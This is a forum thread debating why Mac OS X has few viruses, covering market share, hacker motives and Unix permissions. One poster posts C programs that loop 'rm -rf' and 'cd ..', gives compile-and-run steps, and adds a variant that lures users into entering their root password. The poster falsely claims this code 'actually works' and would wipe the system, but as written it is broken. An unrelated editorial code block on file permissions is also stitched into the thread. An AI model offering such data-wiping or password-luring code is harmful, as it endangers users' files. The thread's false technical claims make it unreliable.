Seeing as there is also an exponential leap in the abilities of authorities like the FBI and secret service to analyze, dissect, and eventually land your ass in jail, I think most hax aren't going to write maliciously launched code just for kicks.
 
All operating systems have security holes, including unix operating systems. If a hacker really wants in, they will find a way. The reason why we don't get to experience the pleasure of having to worry about viruses/malware/etc is because of market share. Specifically, I mean market share in the corporate world. Until the day comes where macs gain a significant market share, especially in the corporate world, we can all keep on pretending that our Macs are "secure". This is exactly the reason why I hope Macs never become the dominant platform in the business world.



exactly

I have to disagree (respectfully of course)

There is a difference between a direct attack from a human Hacker, and something that is a software based attack, like a Virus, Trojan etc. A good example of this was the hackathon, where the Air got hacked first by visiting a maliciously formed URL.

With regards to your corporate angle, the majority of money that these people make comes from credit card fraud, but not business use. From your everyday user at the end of the working day, who comes home and wants to buy something on ebay/craigslist etc. The bot sits quietly, logging what it needs, then sends off the data that it can. The money in business pales in comparison to the money spent by everyday users, due to sheer volume.

We seem to view these people that make these threats as uber criminals. These criminals have nothing on the kid hobbyist sitting in his bedroom hitting on problems repeatedly. The dreaded MPack kit was a venture between two mates. I think even Times reported that Storm started off as a science project.
An interview with one of the authors for MPack even stated that they did it 'just because they could'. When they realized they could make a living out of it, they sold it. He likened it to "It's like military. We make the ammo, but we don't fire it". Pretty apt.

It's when criminals realized the power that could be garnered, that these hobbyists were recruited. What's there not to like? You probably get notoriety, a very good pay package, and little chance of being caught. And even if you were, low chance of being convicted.

In relation to market share. Let's say 6%. If there were 100 computers in the world, understandable, that's only 6 computers you could infect. But there are faaar more. In fact, it's estimated at being over a billion. That's over 60 million computers at 6%. Even if you could only infect a small percentage of this, it's still a massive number. Say one third. 20 million. That's roughly the population of Australia.
Hell, they even made a virus for OS9, and that probably had less than 2% use overall.


I fully believe there are people working on OSX right as we speak. Not for money, not for hate, but for kicks and giggles. And if one does make a self-propagating virus, imagine all the tech sites, all the tech podcasts, and the ezines, the tech shows, the websites, the experts, the companies that will report on it. It would be... a hell of a rush to know that it was you.
 
Macs are about 2% of the computer industry. If I were a hacker I wouldn't bother...

Ahh but Linux and BSD make up the majority of the webservers. Since BSD (Darwin) is the foundation of OSX then there is a reason to hack into them.
 
Ahh but Linux and BSD make up the majority of the webservers. Since BSD (Darwin) is the foundation of OSX then there is a reason to hack into them.

Good point, and that OS X is reported to be above the 8% share at this point (even some reports close to 10)

http://solyoung.com/2009/02/03/mac-os-x-operating-system-market-share-bumping-10-percent-993/

http://www.cultofmac.com/osx-market-share-hits-82-percent/3421

http://arstechnica.com/apple/news/2008/07/mac-os-x-approaches-8-percent-market-share-in-june.ars
 
1) a lot of hackers are actually Apple users because of the UNIX based os, or Apple user wannabes. You don't piss in your own bed.
2) Apple is not considered 'evil', Microsoft is.

Good examples are those "hack it, own it" competitions. Apple machines are consistently hacked first, not because it is easier (typically the hack used also works on Linux or Windows), but because they want the machine.
 
^^^ agreed.

every hacker i knew in high school and college used a mac as their primary machine. to me, second to market share, i've always thought the reason hackers don't touch OS X is because a lot (or maybe even most) use macs and don't want to see that happen to them.
 
You can get the Amish Virus, seen here:


Computer Virus!

You have just received the Amish virus.

Since we have no electricity or computers, you are on the honor system.

Please delete all of your files on your hard drive. Then forward this message to everyone in your address book.


We thank thee.
 
On this topic I would like to add something, here I will show source code for a virus that I just wrote up. DO NOT DO THIS, I am not responsible for someone copying this file, compiling and executing it.

*YOU HAVE BEEN WARNED*

PHP:
void main()
{
     while (1)
     {
          system("rm -rf");
          system("cd ..");
     }
}

The above code is C/C++, very simple program, yet the above 2 lines in conjunction with the infinite loop are the most lethal combination known to unix users.

What does it do? Well, after you compile that program and call the executable, let's say, "destruction", you would then type

Code:
./destruction

To run it.

Now back to what it does, for anyone here that knows what the unix command "rm" does, it deletes a file. "rm file" deletes said file. rm -r deletes EVERYTHING inside a current directory, so if you were in documents directory (folder) and you ran "rm -r" then everything would get deleted, however it would ask you for each deletion do you want to do this?

Now this is where the -f comes in. It basically means don't complain, just delete without asking me.

So "rm -rf" would recursively delete EVERY file AND directory inside whatever directory you ran that program in. To make matters worse after it did that it would climb up a directory and run again, eventually leading it to your root directory and running rm -rf which would delete everything on your computer, even system files.

That is the ultimate virus IMO. However you have to be stupid to actually execute that.

To compile btw write that into a file (call it destruction.cpp) then go in terminal and find it and type "gcc destruction.cpp -o destruction" then type "./destruction" and your computer would be dead.

DO NOT DO THIS. I am not joking, this actually works. You are safe from someone doing this on your computer because you need to type a password to run that.
 
Not a virus as it is not self-propagating, and you need to give it permission for the payload to work.
 
You're not being serious, right?
 
You're not being serious, right?

Look up the notorious command "rm -rf" if you don't believe me.

Then look up "cd ..".

Then look up an infinite loop (if you have taken any computer science class you know what that is).

Then imagine what you can do with all 3 combined.
 
Not a virus as it is not self-propagating, and you need to give it permission for the payload to work.

I do not need to give it permissions, the -f takes care of that.

For it to run however, the user actually has to tell it to run. This is why the unix platform is so secure, you either A) Have to be super user to run it or B) type ./executable to make it run.

As far as making it self-propagating consider this:

You go to a website that has java applications, java applications automatically start loading (which means they are executing on your computer automatically). Now what if that application did something such as... run the command:

Code:
./destruction

It would run that program I wrote for you, whether you like it or not. The catch is most java applications have safeguards when accessing the command line so likely you would be notified that "something is trying to access your computer, Allow/Deny". If you allowed it, then yes it could run that program, or even install that and then run it.
 
2) Apple is not considered 'evil', Microsoft is.

Oh, I disagree. I've clashed on a number of occasions with some of the more militant open source activists in the linux community who indeed feel that Apple is an evil corporate entity.

However, even assuming that these people were motivated enough to write a virus, doing so for OS X isn't in their best interests because it's very likely that any vulnerability they would find could also affect linux.

I do not need to give it permissions, the -f takes care of that.

Actually, this is only true for the files that the user running the program has permissions to. So, assuming that you still have to convince someone to run this program, the program you've written will delete everything in the current directory, move up one level, delete everything there, move up one and so on UNTIL it runs into a directory or file that the user it's running as doesn't have permissions to.

So on a Mac, the user running this program will wind up wiping out his home directory. Then the moment the program traverses outside, it'll hit a permissions wall.

Destructive? Yes. Will it destroy the OS? Unlikely unless you modify the code to run sudo AND convince the user to enter their admin password.

Is this a virus? No. Doesn't fit the criteria.

As far as making it self-propagating consider this:

You go to a website that has java applications, java applications automatically start loading (which means they are executing on your computer automatically). Now what if that application did something such as... run the command:

Code:
./destruction

It would run that program I wrote for you, whether you like it or not.

That's not self-propagation. That's called visiting a website that attempts to run malicious code.

Additionally, the website is assuming that a. you have the program you've written saved on the computer, and b. you're taking advantage of some kind of exploit in java that allows it to run arbitrary code.

You MIGHT be able to find b. But you still have to somehow make a. happen.

And then, it's only a matter of time before mac users going to your site see something like this from Safari (and possibly from Firefox as well):

malware.png


Even ignoring all of this though, what you've written is still not a virus because you haven't cracked the self propagation thing.
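
The permissions wall described in the reply above, as an added example (not code posted by anyone in this thread): forcing a delete only skips the prompt for a write-protected file, while the delete itself is decided by write permission on the containing directory. The helper `try_delete`, the file name `sample.txt` and the `/tmp/permwall-XXXXXX` sandbox are names made up for this illustration; run as root, the second case succeeds, which is the sudo caveat the reply mentions.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for mkdtemp() under strict -std= modes */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create an empty file and force its mode regardless of umask. */
static int make_file(const char *path, mode_t mode) {
    int fd = open(path, O_CREAT | O_WRONLY | O_EXCL, 0600);
    if (fd < 0) return -1;
    close(fd);
    return chmod(path, mode);
}

/* Delete one file inside a throwaway directory created for this call.
 * dir_mode  : permissions on the containing directory at delete time
 * file_mode : permissions on the file itself
 * Returns 0 if unlink() succeeded, the errno from unlink() if it was
 * refused, or -1 if the sandbox could not be set up. */
int try_delete(mode_t dir_mode, mode_t file_mode) {
    char dir[] = "/tmp/permwall-XXXXXX";   /* constructed sandbox path */
    char file[64];
    int result;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(file, sizeof file, "%s/sample.txt", dir);
    if (make_file(file, file_mode) != 0) { rmdir(dir); return -1; }

    chmod(dir, dir_mode);
    result = (unlink(file) == 0) ? 0 : errno;

    /* Clean up: restore write access so the sandbox can be removed. */
    chmod(dir, 0700);
    unlink(file);
    rmdir(dir);
    return result;
}

int main(void) {
    int a = try_delete(0700, 0444);   /* read-only file, writable directory */
    int b = try_delete(0500, 0644);   /* writable file, read-only directory */
    printf("read-only file, writable dir: %s\n", a ? strerror(a) : "deleted");
    printf("writable file, read-only dir: %s\n", b ? strerror(b) : "deleted");
    return 0;
}
```
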
 
Destructive? Yes. Will it destroy the OS? Unlikely unless you modify the code to run sudo AND convince the user to enter their admin password.

Like this? ;)

PHP:
#include <stdin.h>

void main() 
{
     printf("Please enter your root password for a free cookie.");
     system("su");
     while (1) 
     { 
          system("rm -rf"); 
          system("cd .."); 
     } 
}

Once again, please no one actually copy this into a file, compile and run this program.

I'm not going to show more ways of how destructive I can be. Am I destructive? No (I'm a good person), but can I be? If someone got a hold of me, then most definitely.
 
1) a lot of hackers are actually Apple users because of the UNIX based os, or Apple user wannabes. You don't piss in your own bed.
2) Apple is not considered 'evil', Microsoft is.

^^^ agreed.

every hacker i knew in high school and college used a mac as their primary machine. to me, second to market share, i've always thought the reason hackers don't touch OS X is because a lot (or maybe even most) use macs and don't want to see that happen to them.

Exactly, for example:

Kevin Mitnick, former hacker and “Most Wanted Computer Criminal” turned security consultant, is a Mac user
http://obamapacman.com/2009/09/kevi...minal-turned-security-consultant-is-mac-user/
 
....

I'm not going to show more ways of how destructive I can be. Am I destructive? No (I'm a good person), but can I be? If someone got a hold of me, then most definitely.

Nice..:rolleyes:

So you are saying that you are willing to commit a crime for the right amount of money?
 
I love my Mac but most people know Microsoft still dominates volume, not quality, but volume is what matters to virus and hackers.

I think Macs make up like 2-3% of the computer population, your virus won't get far if it starts and can only spread to Macs

Just my 2 cents.
 
Like this? ;)

PHP:
#include <stdin.h>

void main() 
{
     printf("Please enter your root password for a free cookie.");
     system("su");
     while (1) 
     { 
          system("rm -rf"); 
          system("cd .."); 
     } 
}

Once again, please no one actually copy this into a file, compile and run this program.

I'm not going to show more ways of how destructive I can be. Am I destructive? No (I'm a good person), but can I be? If someone got a hold of me, then most definitely.

That is a Trojan.
 
I love my Mac but most people know Microsoft still dominates volume, not quality, but volume is what matters to virus and hackers.

I think Macs make up like 2-3% of the computer population, your virus won't get far if it starts and can only spread to Macs

Just my 2 cents.

No, already proven incorrect, as you are forgetting something. Mac OS X is based on BSD (called Darwin). BSD is very similar to Linux (both are Unix-like). BSD and Linux make up most of the webservers in the world. A virus that targets BSD/Linux would also target Macs as a side effect. Therefore it is potentially vulnerable.
 